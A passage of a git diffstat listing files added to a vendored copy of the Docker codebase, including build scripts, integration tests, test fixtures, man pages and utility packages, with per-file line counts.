 .../github.com/docker/docker/hack/install.sh  |  484 +
 vendor/github.com/docker/docker/hack/make.ps1 |  408 +
 vendor/github.com/docker/docker/hack/make.sh  |  304 +
 .../docker/docker/hack/make/.binary           |   48 +
 .../docker/docker/hack/make/.binary-setup     |   10 +
 .../docker/docker/hack/make/.build-deb/compat |    1 +
 .../docker/hack/make/.build-deb/control       |   29 +
 .../.build-deb/docker-engine.bash-completion  |    1 +
 .../.build-deb/docker-engine.docker.default   |    1 +
 .../make/.build-deb/docker-engine.docker.init |    1 +
 .../.build-deb/docker-engine.docker.upstart   |    1 +
 .../make/.build-deb/docker-engine.install     |   12 +
 .../make/.build-deb/docker-engine.manpages    |    1 +
 .../make/.build-deb/docker-engine.postinst    |   20 +
 .../hack/make/.build-deb/docker-engine.udev   |    1 +
 .../docker/docker/hack/make/.build-deb/docs   |    1 +
 .../docker/docker/hack/make/.build-deb/rules  |   55 +
 .../.build-rpm/docker-engine-selinux.spec     |   96 +
 .../hack/make/.build-rpm/docker-engine.spec   |  254 +
 .../docker/hack/make/.detect-daemon-osarch    |   69 +
 .../docker/docker/hack/make/.ensure-emptyfs   |   23 +
 .../docker/docker/hack/make/.go-autogen       |   86 +
 .../docker/docker/hack/make/.go-autogen.ps1   |   91 +
 .../hack/make/.integration-daemon-setup       |    7 +
 .../hack/make/.integration-daemon-start       |  116 +
 .../docker/hack/make/.integration-daemon-stop |   27 +
 .../hack/make/.integration-test-helpers       |   79 +
 .../hack/make/.resources-windows/common.rc    |   38 +
 .../.resources-windows/docker.exe.manifest    |   18 +
 .../hack/make/.resources-windows/docker.ico   |  Bin 0 -> 370070 bytes
 .../hack/make/.resources-windows/docker.png   |  Bin 0 -> 658195 bytes
 .../hack/make/.resources-windows/docker.rc    |    3 +
 .../hack/make/.resources-windows/dockerd.rc   |    4 +
 .../make/.resources-windows/event_messages.mc |   39 +
 .../hack/make/.resources-windows/resources.go |   18 +
 .../docker/docker/hack/make/README.md         |   17 +
 .../github.com/docker/docker/hack/make/binary |   15 +
 .../docker/docker/hack/make/binary-client     |   12 +
 .../docker/docker/hack/make/binary-daemon     |   13 +
 .../docker/docker/hack/make/build-deb         |   91 +
 .../hack/make/build-integration-test-binary   |   11 +
 .../docker/docker/hack/make/build-rpm         |  148 +
 .../docker/docker/hack/make/clean-apt-repo    |   43 +
 .../docker/docker/hack/make/clean-yum-repo    |   20 +
 .../github.com/docker/docker/hack/make/cover  |   15 +
 .../github.com/docker/docker/hack/make/cross  |   46 +
 .../docker/docker/hack/make/dynbinary         |   15 +
 .../docker/docker/hack/make/dynbinary-client  |   12 +
 .../docker/docker/hack/make/dynbinary-daemon  |   12 +
 .../docker/hack/make/generate-index-listing   |   74 +
 .../docker/docker/hack/make/install-binary    |   12 +
 .../docker/hack/make/install-binary-client    |   10 +
 .../docker/hack/make/install-binary-daemon    |   16 +
 .../docker/docker/hack/make/install-script    |   63 +
 .../docker/docker/hack/make/release-deb       |  163 +
 .../docker/docker/hack/make/release-rpm       |   71 +
 vendor/github.com/docker/docker/hack/make/run |   44 +
 .../docker/docker/hack/make/sign-repos        |   65 +
 .../docker/docker/hack/make/test-deb-install  |   71 +
 .../docker/docker/hack/make/test-docker-py    |   20 +
 .../docker/hack/make/test-install-script      |   31 +
 .../docker/hack/make/test-integration-cli     |   28 +
 .../docker/hack/make/test-integration-shell   |    7 +
 .../docker/docker/hack/make/test-old-apt-repo |   29 +
 .../docker/docker/hack/make/test-unit         |   55 +
 vendor/github.com/docker/docker/hack/make/tgz |   92 +
 .../github.com/docker/docker/hack/make/ubuntu |  190 +
 .../docker/docker/hack/make/update-apt-repo   |   70 +
 vendor/github.com/docker/docker/hack/make/win |   20 +
 .../github.com/docker/docker/hack/release.sh  |  325 +
 .../docker/hack/validate/.swagger-yamllint    |    4 +
 .../docker/docker/hack/validate/.validate     |   30 +
 .../docker/docker/hack/validate/all           |    8 +
 .../docker/hack/validate/compose-bindata      |   28 +
 .../docker/docker/hack/validate/dco           |   55 +
 .../docker/docker/hack/validate/default       |   16 +
 .../docker/hack/validate/default-seccomp      |   28 +
 .../docker/docker/hack/validate/gofmt         |   33 +
 .../docker/docker/hack/validate/lint          |   31 +
 .../docker/docker/hack/validate/pkg-imports   |   33 +
 .../docker/docker/hack/validate/swagger       |   13 +
 .../docker/docker/hack/validate/swagger-gen   |   29 +
 .../docker/docker/hack/validate/test-imports  |   38 +
 .../docker/docker/hack/validate/toml          |   31 +
 .../docker/docker/hack/validate/vendor        |   30 +
 .../docker/docker/hack/validate/vet           |   32 +
 .../github.com/docker/docker/hack/vendor.sh   |   15 +
 vendor/github.com/docker/docker/image/fs.go   |  173 +
 .../github.com/docker/docker/image/fs_test.go |  384 +
 .../github.com/docker/docker/image/image.go   |  150 +
 .../docker/docker/image/image_test.go         |   59 +
 .../github.com/docker/docker/image/rootfs.go  |   44 +
 .../docker/docker/image/spec/v1.1.md          |  637 ++
 .../docker/docker/image/spec/v1.2.md          |  696 ++
 .../github.com/docker/docker/image/spec/v1.md |  573 ++
 .../github.com/docker/docker/image/store.go   |  295 +
 .../docker/docker/image/store_test.go         |  300 +
 .../docker/docker/image/tarexport/load.go     |  390 +
 .../docker/docker/image/tarexport/save.go     |  355 +
 .../docker/image/tarexport/tarexport.go       |   47 +
 .../docker/docker/image/v1/imagev1.go         |  156 +
 .../docker/docker/image/v1/imagev1_test.go    |   55 +
 .../docker/integration-cli/benchmark_test.go  |   95 +
 .../docker/integration-cli/check_test.go      |  383 +
 .../docker/docker/integration-cli/daemon.go   |  608 ++
 .../docker/integration-cli/daemon_swarm.go    |  419 +
 .../integration-cli/daemon_swarm_hack.go      |   20 +
 .../docker/integration-cli/daemon_unix.go     |   35 +
 .../docker/integration-cli/daemon_windows.go  |   53 +
 .../integration-cli/docker_api_attach_test.go |  210 +
 .../integration-cli/docker_api_auth_test.go   |   25 +
 .../integration-cli/docker_api_build_test.go  |  254 +
 .../docker_api_containers_test.go             | 1961 +++++
 .../integration-cli/docker_api_create_test.go |   84 +
 .../integration-cli/docker_api_events_test.go |   73 +
 .../docker_api_exec_resize_test.go            |  103 +
 .../integration-cli/docker_api_exec_test.go   |  198 +
 .../integration-cli/docker_api_images_test.go |  165 +
 .../integration-cli/docker_api_info_test.go   |   53 +
 .../docker_api_inspect_test.go                |  183 +
 .../docker_api_inspect_unix_test.go           |   35 +
 .../integration-cli/docker_api_logs_test.go   |   87 +
 .../docker_api_network_test.go                |  353 +
 .../integration-cli/docker_api_resize_test.go |   44 +
 .../docker_api_service_update_test.go         |   39 +
 .../integration-cli/docker_api_stats_test.go  |  310 +
 .../docker_api_stats_unix_test.go             |   41 +
 .../integration-cli/docker_api_swarm_test.go  | 1367 +++
 .../docker/integration-cli/docker_api_test.go |  118 +
 .../docker_api_update_unix_test.go            |   35 +
 .../docker_api_version_test.go                |   23 +
 .../docker_api_volumes_test.go                |   89 +
 .../integration-cli/docker_cli_attach_test.go |  168 +
 .../docker_cli_attach_unix_test.go            |  237 +
 .../docker_cli_authz_plugin_v2_test.go        |  133 +
 .../docker_cli_authz_unix_test.go             |  477 +
 .../integration-cli/docker_cli_build_test.go  | 7392 ++++++++++++++++
 .../docker_cli_build_unix_test.go             |  207 +
 .../docker_cli_by_digest_test.go              |  693 ++
 .../integration-cli/docker_cli_commit_test.go |  157 +
 .../integration-cli/docker_cli_config_test.go |  140 +
 .../docker_cli_cp_from_container_test.go      |  488 ++
 .../integration-cli/docker_cli_cp_test.go     |  660 ++
 .../docker_cli_cp_to_container_test.go        |  599 ++
 .../docker_cli_cp_to_container_unix_test.go   |   39 +
 .../integration-cli/docker_cli_cp_utils.go    |  303 +
 .../integration-cli/docker_cli_create_test.go |  513 ++
 .../docker_cli_daemon_plugins_test.go         |  317 +
 .../integration-cli/docker_cli_daemon_test.go | 2988 +++++++
 .../integration-cli/docker_cli_diff_test.go   |   98 +
 .../integration-cli/docker_cli_events_test.go |  794 ++
 .../docker_cli_events_unix_test.go            |  486 +
 .../integration-cli/docker_cli_exec_test.go   |  601 ++
 .../docker_cli_exec_unix_test.go              |   93 +
 .../docker_cli_experimental_test.go           |   36 +
 .../docker_cli_export_import_test.go          |   49 +
 ...cker_cli_external_graphdriver_unix_test.go |  405 +
 ...er_cli_external_volume_driver_unix_test.go |  627 ++
 .../integration-cli/docker_cli_health_test.go |  169 +
 .../integration-cli/docker_cli_help_test.go   |  321 +
 .../docker_cli_history_test.go                |  121 +
 .../integration-cli/docker_cli_images_test.go |  364 +
 .../integration-cli/docker_cli_import_test.go |  150 +
 .../integration-cli/docker_cli_info_test.go   |  234 +
 .../docker_cli_info_unix_test.go              |   15 +
 .../docker_cli_inspect_test.go                |  466 +
 .../integration-cli/docker_cli_kill_test.go   |  134 +
 .../integration-cli/docker_cli_links_test.go  |  240 +
 .../docker_cli_links_unix_test.go             |   26 +
 .../integration-cli/docker_cli_login_test.go  |   44 +
 .../integration-cli/docker_cli_logout_test.go |  100 +
 .../docker_cli_logs_bench_test.go             |   32 +
 .../integration-cli/docker_cli_logs_test.go   |  328 +
 .../integration-cli/docker_cli_nat_test.go    |   93 +
 .../docker_cli_netmode_test.go                |   94 +
 .../docker_cli_network_unix_test.go           | 1791 ++++
 .../docker_cli_oom_killed_test.go             |   30 +
 .../integration-cli/docker_cli_pause_test.go  |   66 +
 .../docker_cli_plugins_test.go                |  393 +
 .../integration-cli/docker_cli_port_test.go   |  319 +
 .../integration-cli/docker_cli_proxy_test.go  |   53 +
 .../docker_cli_prune_unix_test.go             |   91 +
 .../integration-cli/docker_cli_ps_test.go     |  952 ++
 .../docker_cli_pull_local_test.go             |  492 ++
 .../integration-cli/docker_cli_pull_test.go   |  274 +
 .../docker_cli_pull_trusted_test.go           |  365 +
 .../integration-cli/docker_cli_push_test.go   |  715 ++
 .../docker_cli_registry_user_agent_test.go    |  120 +
 .../integration-cli/docker_cli_rename_test.go |  138 +
 .../docker_cli_restart_test.go                |  278 +
 .../integration-cli/docker_cli_rm_test.go     |   86 +
 .../integration-cli/docker_cli_rmi_test.go    |  352 +
 .../integration-cli/docker_cli_run_test.go    | 4689 ++++++++++
 .../docker_cli_run_unix_test.go               | 1592 ++++
 .../docker_cli_save_load_test.go              |  383 +
 .../docker_cli_save_load_unix_test.go         |  109 +
 .../integration-cli/docker_cli_search_test.go |  131 +
 .../docker_cli_secret_create_test.go          |  131 +
 .../docker_cli_secret_inspect_test.go         |   68 +
 .../docker_cli_service_create_test.go         |  175 +
 .../docker_cli_service_health_test.go         |  191 +
 ...cker_cli_service_logs_experimental_test.go |   96 +
 .../docker_cli_service_scale_test.go          |   57 +
 .../docker_cli_service_update_test.go         |  130 +
 .../integration-cli/docker_cli_sni_test.go    |   44 +
 .../integration-cli/docker_cli_stack_test.go  |  186 +
 .../integration-cli/docker_cli_start_test.go  |  199 +
 .../integration-cli/docker_cli_stats_test.go  |  159 +
 .../integration-cli/docker_cli_stop_test.go   |   17 +
 .../integration-cli/docker_cli_swarm_test.go  | 1254 +++
 .../docker_cli_swarm_unix_test.go             |   52 +
 .../integration-cli/docker_cli_tag_test.go    |  225 +
 .../integration-cli/docker_cli_top_test.go    |   73 +
 .../integration-cli/docker_cli_update_test.go |   41 +
 .../docker_cli_update_unix_test.go            |  283 +
 .../integration-cli/docker_cli_userns_test.go |   98 +
 .../docker_cli_v2_only_test.go                |  125 +
 .../docker_cli_version_test.go                |   58 +
 .../integration-cli/docker_cli_volume_test.go |  427 +
 .../integration-cli/docker_cli_wait_test.go   |   97 +
 .../docker_deprecated_api_v124_test.go        |  227 +
 .../docker_deprecated_api_v124_unix_test.go   |   30 +
 .../docker_experimental_network_test.go       |  594 ++
 .../docker_hub_pull_suite_test.go             |   90 +
 .../integration-cli/docker_test_vars.go       |  165 +
 .../docker/integration-cli/docker_utils.go    | 1607 ++++
 .../docker/integration-cli/events_utils.go    |  206 +
 .../docker/docker/integration-cli/fixtures.go |   69 +
 .../auth/docker-credential-shell-test         |   55 +
 .../fixtures/credentialspecs/valid.json       |   25 +
 .../fixtures/deploy/default.yaml              |    9 +
 .../fixtures/deploy/remove.yaml               |   11 +
 .../fixtures/deploy/secrets.yaml              |   20 +
 .../integration-cli/fixtures/https/ca.pem     |   23 +
 .../fixtures/https/client-cert.pem            |   73 +
 .../fixtures/https/client-key.pem             |   16 +
 .../fixtures/https/client-rogue-cert.pem      |   73 +
 .../fixtures/https/client-rogue-key.pem       |   16 +
 .../fixtures/https/server-cert.pem            |   76 +
 .../fixtures/https/server-key.pem             |   16 +
 .../fixtures/https/server-rogue-cert.pem      |   76 +
 .../fixtures/https/server-rogue-key.pem       |   16 +
 .../fixtures/load/emptyLayer.tar              |  Bin 0 -> 30720 bytes
 .../integration-cli/fixtures/load/frozen.go   |  182 +
 .../fixtures/notary/delgkey1.crt              |   21 +
 .../fixtures/notary/delgkey1.key              |   27 +
 .../fixtures/notary/delgkey2.crt              |   21 +
 .../fixtures/notary/delgkey2.key              |   27 +
 .../fixtures/notary/delgkey3.crt              |   21 +
 .../fixtures/notary/delgkey3.key              |   27 +
 .../fixtures/notary/delgkey4.crt              |   21 +
 .../fixtures/notary/delgkey4.key              |   27 +
 .../integration-cli/fixtures/notary/gen.sh    |   18 +
 .../fixtures/notary/localhost.cert            |   19 +
 .../fixtures/notary/localhost.key             |   27 +
 .../fixtures/registry/cert.pem                |   21 +
 .../integration-cli/fixtures/secrets/default  |    1 +
 .../integration-cli/fixtures_linux_daemon.go  |  143 +
 .../docker/docker/integration-cli/npipe.go    |   12 +
 .../docker/integration-cli/npipe_windows.go   |   12 +
 .../docker/docker/integration-cli/registry.go |  177 +
 .../docker/integration-cli/registry_mock.go   |   55 +
 .../docker/integration-cli/requirements.go    |  243 +
 .../integration-cli/requirements_unix.go      |  159 +
 .../docker/integration-cli/test_vars.go       |   11 +
 .../docker/integration-cli/test_vars_exec.go  |    8 +
 .../integration-cli/test_vars_noexec.go       |    8 +
 .../integration-cli/test_vars_noseccomp.go    |    8 +
 .../integration-cli/test_vars_seccomp.go      |    8 +
 .../docker/integration-cli/test_vars_unix.go  |   14 +
 .../integration-cli/test_vars_windows.go      |   15 +
 .../docker/integration-cli/trust_server.go    |  344 +
 .../docker/docker/integration-cli/utils.go    |   79 +
 .../github.com/docker/docker/layer/empty.go   |   56 +
 .../docker/docker/layer/empty_test.go         |   46 +
 .../docker/docker/layer/filestore.go          |  354 +
 .../docker/docker/layer/filestore_test.go     |  104 +
 .../github.com/docker/docker/layer/layer.go   |  275 +
 .../docker/docker/layer/layer_store.go        |  684 ++
 .../docker/layer/layer_store_windows.go       |   11 +
 .../docker/docker/layer/layer_test.go         |  771 ++
 .../docker/docker/layer/layer_unix.go         |    9 +
 .../docker/docker/layer/layer_unix_test.go    |   71 +
 .../docker/docker/layer/layer_windows.go      |   98 +
 .../docker/docker/layer/migration.go          |  256 +
 .../docker/docker/layer/migration_test.go     |  435 +
 .../docker/docker/layer/mount_test.go         |  230 +
 .../docker/docker/layer/mounted_layer.go      |   99 +
 .../docker/docker/layer/ro_layer.go           |  192 +
 .../docker/docker/layer/ro_layer_windows.go   |    9 +
 .../docker/docker/libcontainerd/client.go     |   46 +
 .../docker/libcontainerd/client_linux.go      |  605 ++
 .../docker/libcontainerd/client_solaris.go    |  101 +
 .../docker/libcontainerd/client_unix.go       |  142 +
 .../docker/libcontainerd/client_windows.go    |  631 ++
 .../docker/docker/libcontainerd/container.go  |   13 +
 .../docker/libcontainerd/container_unix.go    |  250 +
 .../docker/libcontainerd/container_windows.go |  311 +
 .../docker/docker/libcontainerd/oom_linux.go  |   31 +
 .../docker/libcontainerd/oom_solaris.go       |    5 +
 .../docker/libcontainerd/pausemonitor_unix.go |   42 +
 .../docker/docker/libcontainerd/process.go    |   18 +
 .../docker/libcontainerd/process_unix.go      |  107 +
 .../docker/libcontainerd/process_windows.go   |   51 +
 .../docker/docker/libcontainerd/queue_unix.go |   31 +
 .../docker/docker/libcontainerd/remote.go     |   20 +
 .../docker/libcontainerd/remote_unix.go       |  544 ++
 .../docker/libcontainerd/remote_windows.go    |   36 +
 .../docker/docker/libcontainerd/types.go      |   75 +
 .../docker/libcontainerd/types_linux.go       |   49 +
 .../docker/libcontainerd/types_solaris.go     |   43 +
 .../docker/libcontainerd/types_windows.go     |   79 +
 .../docker/libcontainerd/utils_linux.go       |   62 +
 .../docker/libcontainerd/utils_solaris.go     |   27 +
 .../docker/libcontainerd/utils_windows.go     |   46 +
 .../libcontainerd/utils_windows_test.go       |   13 +
 .../github.com/docker/docker/man/Dockerfile   |   24 +
 .../docker/docker/man/Dockerfile.5.md         |  474 +
 .../docker/docker/man/Dockerfile.aarch64      |   25 +
 .../docker/docker/man/Dockerfile.armhf        |   43 +
 .../docker/docker/man/Dockerfile.ppc64le      |   35 +
 .../docker/docker/man/Dockerfile.s390x        |   35 +
 vendor/github.com/docker/docker/man/README.md |   15 +
 .../docker/docker/man/docker-attach.1.md      |   99 +
 .../docker/docker/man/docker-build.1.md       |  340 +
 .../docker/docker/man/docker-commit.1.md      |   71 +
 .../docker/docker/man/docker-config-json.5.md |   72 +
 .../docker/docker/man/docker-cp.1.md          |  175 +
 .../docker/docker/man/docker-create.1.md      |  553 ++
 .../docker/docker/man/docker-diff.1.md        |   49 +
 .../docker/docker/man/docker-events.1.md      |  180 +
 .../docker/docker/man/docker-exec.1.md        |   71 +
 .../docker/docker/man/docker-export.1.md      |   46 +
 .../docker/docker/man/docker-history.1.md     |   52 +
 .../docker/docker/man/docker-images.1.md      |  153 +
 .../docker/docker/man/docker-import.1.md      |   72 +
 .../docker/docker/man/docker-info.1.md        |  187 +
 .../docker/docker/man/docker-inspect.1.md     |  323 +
 .../docker/docker/man/docker-kill.1.md        |   28 +
 .../docker/docker/man/docker-load.1.md        |   56 +
 .../docker/docker/man/docker-login.1.md       |   53 +
 .../docker/docker/man/docker-logout.1.md      |   32 +
 .../docker/docker/man/docker-logs.1.md        |   71 +
 .../docker/man/docker-network-connect.1.md    |   66 +
 .../docker/man/docker-network-create.1.md     |  187 +
 .../docker/man/docker-network-disconnect.1.md |   36 +
 .../docker/man/docker-network-inspect.1.md    |  112 +
 .../docker/docker/man/docker-network-ls.1.md  |  188 +
 .../docker/docker/man/docker-network-rm.1.md  |   43 +
 .../docker/docker/man/docker-pause.1.md       |   32 +
 .../docker/docker/man/docker-port.1.md        |   47 +
 .../docker/docker/man/docker-ps.1.md          |  145 +
 .../docker/docker/man/docker-pull.1.md        |  220 +
 .../docker/docker/man/docker-push.1.md        |   63 +
 .../docker/docker/man/docker-rename.1.md      |   15 +
 .../docker/docker/man/docker-restart.1.md     |   26 +
 .../docker/docker/man/docker-rm.1.md          |   72 +
 .../docker/docker/man/docker-rmi.1.md         |   42 +
 .../docker/docker/man/docker-run.1.md         | 1055 +++
 .../docker/docker/man/docker-save.1.md        |   45 +
 .../docker/docker/man/docker-search.1.md      |   70 +
 .../docker/docker/man/docker-start.1.md       |   39 +
 .../docker/docker/man/docker-stats.1.md       |   57 +
 .../docker/docker/man/docker-stop.1.md        |   30 +
 .../docker/docker/man/docker-tag.1.md         |   76 +
 .../docker/docker/man/docker-top.1.md         |   36 +
 .../docker/docker/man/docker-unpause.1.md     |   28 +
 .../docker/docker/man/docker-update.1.md      |  171 +
 .../docker/docker/man/docker-version.1.md     |   62 +
 .../docker/docker/man/docker-wait.1.md        |   30 +
 .../github.com/docker/docker/man/docker.1.md  |  237 +
 .../github.com/docker/docker/man/dockerd.8.md |  710 ++
 .../github.com/docker/docker/man/generate.go  |   43 +
 .../github.com/docker/docker/man/generate.sh  |   15 +
 .../github.com/docker/docker/man/glide.lock   |   52 +
 .../github.com/docker/docker/man/glide.yaml   |   12 +
 .../docker/docker/man/md2man-all.sh           |   22 +
 .../docker/docker/migrate/v1/migratev1.go     |  504 ++
 .../docker/migrate/v1/migratev1_test.go       |  438 +
 .../docker/docker/oci/defaults_linux.go       |  168 +
 .../docker/docker/oci/defaults_solaris.go     |   20 +
 .../docker/docker/oci/defaults_windows.go     |   19 +
 .../docker/docker/oci/devices_linux.go        |   86 +
 .../docker/docker/oci/devices_unsupported.go  |   20 +
 .../docker/docker/oci/namespaces.go           |   16 +
 vendor/github.com/docker/docker/opts/hosts.go |  151 +
 .../docker/docker/opts/hosts_test.go          |  148 +
 .../docker/docker/opts/hosts_unix.go          |    8 +
 .../docker/docker/opts/hosts_windows.go       |    6 +
 vendor/github.com/docker/docker/opts/ip.go    |   47 +
 .../github.com/docker/docker/opts/ip_test.go  |   54 +
 vendor/github.com/docker/docker/opts/mount.go |  171 +
 .../docker/docker/opts/mount_test.go          |  184 +
 vendor/github.com/docker/docker/opts/opts.go  |  360 +
 .../docker/docker/opts/opts_test.go           |  232 +
 .../docker/docker/opts/opts_unix.go           |    6 +
 .../docker/docker/opts/opts_windows.go        |   56 +
 vendor/github.com/docker/docker/opts/port.go  |  146 +
 .../docker/docker/opts/port_test.go           |  259 +
 .../docker/docker/opts/quotedstring.go        |   37 +
 .../docker/docker/opts/quotedstring_test.go   |   28 +
 .../github.com/docker/docker/opts/secret.go   |  107 +
 .../docker/docker/opts/secret_test.go         |   79 +
 vendor/github.com/docker/docker/pkg/README.md |   11 +
 .../docker/docker/pkg/aaparser/aaparser.go    |   91 +
 .../docker/pkg/aaparser/aaparser_test.go      |   73 +
 .../docker/docker/pkg/archive/README.md       |    1 +
 .../docker/docker/pkg/archive/archive.go      | 1175 +++
 .../docker/pkg/archive/archive_linux.go       |   95 +
 .../docker/pkg/archive/archive_linux_test.go  |  187 +
 .../docker/pkg/archive/archive_other.go       |    7 +
 .../docker/docker/pkg/archive/archive_test.go | 1162 +++
 .../docker/docker/pkg/archive/archive_unix.go |  118 +
 .../docker/pkg/archive/archive_unix_test.go   |  249 +
 .../docker/pkg/archive/archive_windows.go     |   70 +
 .../pkg/archive/archive_windows_test.go       |   91 +
 .../docker/docker/pkg/archive/changes.go      |  446 +
 .../docker/pkg/archive/changes_linux.go       |  312 +
 .../docker/pkg/archive/changes_other.go       |   97 +
 .../docker/pkg/archive/changes_posix_test.go  |  132 +
 .../docker/docker/pkg/archive/changes_test.go |  572 ++
 .../docker/docker/pkg/archive/changes_unix.go |   36 +
 .../docker/pkg/archive/changes_windows.go     |   30 +
 .../docker/docker/pkg/archive/copy.go         |  458 +
 .../docker/docker/pkg/archive/copy_unix.go    |   11 +
 .../docker/pkg/archive/copy_unix_test.go      |  978 +++
 .../docker/docker/pkg/archive/copy_windows.go |    9 +
 .../docker/docker/pkg/archive/diff.go         |  279 +
 .../docker/docker/pkg/archive/diff_test.go    |  386 +
 .../docker/pkg/archive/example_changes.go     |   97 +
 .../docker/pkg/archive/testdata/broken.tar    |  Bin 0 -> 13824 bytes
 .../docker/docker/pkg/archive/time_linux.go   |   16 +
 .../docker/pkg/archive/time_unsupported.go    |   16 +
 .../docker/docker/pkg/archive/utils_test.go   |  166 +
 .../docker/docker/pkg/archive/whiteouts.go    |   23 +
 .../docker/docker/pkg/archive/wrap.go         |   59 +
 .../docker/docker/pkg/archive/wrap_test.go    |   98 +
 .../docker/docker/pkg/authorization/api.go    |   88 +
 .../docker/docker/pkg/authorization/authz.go  |  186 +
 .../pkg/authorization/authz_unix_test.go      |  282 +
 .../docker/pkg/authorization/middleware.go    |   84 +
 .../docker/docker/pkg/authorization/plugin.go |  112 +
 .../docker/pkg/authorization/response.go      |  203 +
 .../docker/pkg/broadcaster/unbuffered.go      |   49 +
 .../docker/pkg/broadcaster/unbuffered_test.go |  162 +
 .../docker/pkg/chrootarchive/archive.go       |   97 +
 .../docker/pkg/chrootarchive/archive_test.go  |  394 +
 .../docker/pkg/chrootarchive/archive_unix.go  |   86 +
 .../pkg/chrootarchive/archive_windows.go      |   22 +
 .../docker/pkg/chrootarchive/chroot_linux.go  |  108 +
 .../docker/pkg/chrootarchive/chroot_unix.go   |   12 +
 .../docker/docker/pkg/chrootarchive/diff.go   |   23 +
 .../docker/pkg/chrootarchive/diff_unix.go     |  130 +
 .../docker/pkg/chrootarchive/diff_windows.go  |   45 +
 .../docker/pkg/chrootarchive/init_unix.go     |   28 +
 .../docker/pkg/chrootarchive/init_windows.go  |    4 +
 .../docker/pkg/devicemapper/devmapper.go      |  828 ++
 .../docker/pkg/devicemapper/devmapper_log.go  |   35 +
 .../pkg/devicemapper/devmapper_wrapper.go     |  251 +
 .../devmapper_wrapper_deferred_remove.go      |   34 +
 .../devmapper_wrapper_no_deferred_remove.go   |   15 +
 .../docker/docker/pkg/devicemapper/ioctl.go   |   27 +
 .../docker/docker/pkg/devicemapper/log.go     |   11 +
 .../docker/docker/pkg/directory/directory.go  |   26 +
 .../docker/pkg/directory/directory_test.go    |  192 +
 .../docker/pkg/directory/directory_unix.go    |   48 +
 .../docker/pkg/directory/directory_windows.go |   37 +
 .../docker/docker/pkg/discovery/README.md     |   41 +
 .../docker/docker/pkg/discovery/backends.go   |  107 +
 .../docker/docker/pkg/discovery/discovery.go  |   35 +
 .../docker/pkg/discovery/discovery_test.go    |  137 +
 .../docker/docker/pkg/discovery/entry.go      |   94 +
 .../docker/docker/pkg/discovery/file/file.go  |  107 +
 .../docker/pkg/discovery/file/file_test.go    |  114 +
 .../docker/docker/pkg/discovery/generator.go  |   35 +
 .../docker/pkg/discovery/generator_test.go    |   53 +
 .../docker/docker/pkg/discovery/kv/kv.go      |  192 +
 .../docker/docker/pkg/discovery/kv/kv_test.go |  324 +
 .../docker/pkg/discovery/memory/memory.go     |   93 +
 .../pkg/discovery/memory/memory_test.go       |   48 +
 .../docker/pkg/discovery/nodes/nodes.go       |   54 +
 .../docker/pkg/discovery/nodes/nodes_test.go  |   51 +
 .../docker/pkg/filenotify/filenotify.go       |   40 +
 .../docker/docker/pkg/filenotify/fsnotify.go  |   18 +
 .../docker/docker/pkg/filenotify/poller.go    |  204 +
 .../docker/pkg/filenotify/poller_test.go      |  119 +
 .../docker/docker/pkg/fileutils/fileutils.go  |  283 +
 .../docker/pkg/fileutils/fileutils_darwin.go  |   27 +
 .../docker/pkg/fileutils/fileutils_solaris.go |    7 +
 .../docker/pkg/fileutils/fileutils_test.go    |  585 ++
 .../docker/pkg/fileutils/fileutils_unix.go    |   22 +
 .../docker/pkg/fileutils/fileutils_windows.go |    7 +
 .../docker/pkg/fsutils/fsutils_linux.go       |   89 +
 .../docker/pkg/fsutils/fsutils_linux_test.go  |   91 +
 .../docker/docker/pkg/gitutils/gitutils.go    |  100 +
 .../docker/pkg/gitutils/gitutils_test.go      |  220 +
 .../docker/pkg/graphdb/conn_sqlite3_linux.go  |   19 +
 .../docker/pkg/graphdb/graphdb_linux.go       |  551 ++
 .../docker/pkg/graphdb/graphdb_linux_test.go  |  721 ++
 .../docker/docker/pkg/graphdb/sort_linux.go   |   27 +
 .../docker/pkg/graphdb/sort_linux_test.go     |   29 +
 .../docker/docker/pkg/graphdb/unsupported.go  |    3 +
 .../docker/docker/pkg/graphdb/utils_linux.go  |   32 +
 .../docker/docker/pkg/homedir/homedir.go      |   39 +
 .../docker/docker/pkg/homedir/homedir_test.go |   24 +
 .../docker/docker/pkg/httputils/httputils.go  |   56 +
 .../docker/pkg/httputils/httputils_test.go    |  115 +
 .../docker/docker/pkg/httputils/mimetype.go   |   30 +
 .../docker/pkg/httputils/mimetype_test.go     |   13 +
 .../pkg/httputils/resumablerequestreader.go   |   95 +
 .../httputils/resumablerequestreader_test.go  |  307 +
 .../docker/docker/pkg/idtools/idtools.go      |  197 +
 .../docker/docker/pkg/idtools/idtools_unix.go |  207 +
 .../docker/pkg/idtools/idtools_unix_test.go   |  271 +
 .../docker/pkg/idtools/idtools_windows.go     |   25 +
 .../docker/pkg/idtools/usergroupadd_linux.go  |  164 +
 .../pkg/idtools/usergroupadd_unsupported.go   |   12 +
 .../docker/docker/pkg/idtools/utils_unix.go   |   32 +
 .../docker/pkg/integration/checker/checker.go |   46 +
 .../docker/pkg/integration/cmd/command.go     |  294 +
 .../pkg/integration/cmd/command_test.go       |  118 +
 .../docker/docker/pkg/integration/utils.go    |  227 +
 .../docker/pkg/integration/utils_test.go      |  363 +
 .../docker/docker/pkg/ioutils/buffer.go       |   51 +
 .../docker/docker/pkg/ioutils/buffer_test.go  |   75 +
 .../docker/docker/pkg/ioutils/bytespipe.go    |  186 +
 .../docker/pkg/ioutils/bytespipe_test.go      |  159 +
 .../docker/docker/pkg/ioutils/fmt.go          |   22 +
 .../docker/docker/pkg/ioutils/fmt_test.go     |   17 +
 .../docker/docker/pkg/ioutils/fswriters.go    |  162 +
 .../docker/pkg/ioutils/fswriters_test.go      |  132 +
 .../docker/docker/pkg/ioutils/multireader.go  |  223 +
 .../docker/pkg/ioutils/multireader_test.go    |  211 +
 .../docker/docker/pkg/ioutils/readers.go      |  154 +
 .../docker/docker/pkg/ioutils/readers_test.go |   94 +
 .../docker/docker/pkg/ioutils/temp_unix.go    |   10 +
 .../docker/docker/pkg/ioutils/temp_windows.go |   18 +
 .../docker/docker/pkg/ioutils/writeflusher.go |   92 +
 .../docker/docker/pkg/ioutils/writers.go      |   66 +
 .../docker/docker/pkg/ioutils/writers_test.go |   65 +
 .../docker/docker/pkg/jsonlog/jsonlog.go      |   42 +
 .../docker/pkg/jsonlog/jsonlog_marshalling.go |  178 +
 .../pkg/jsonlog/jsonlog_marshalling_test.go   |   34 +
 .../docker/docker/pkg/jsonlog/jsonlogbytes.go |  122 +
 .../docker/pkg/jsonlog/jsonlogbytes_test.go   |   39 +
 .../docker/pkg/jsonlog/time_marshalling.go    |   27 +
 .../pkg/jsonlog/time_marshalling_test.go      |   47 +
 .../docker/pkg/jsonmessage/jsonmessage.go     |  225 +
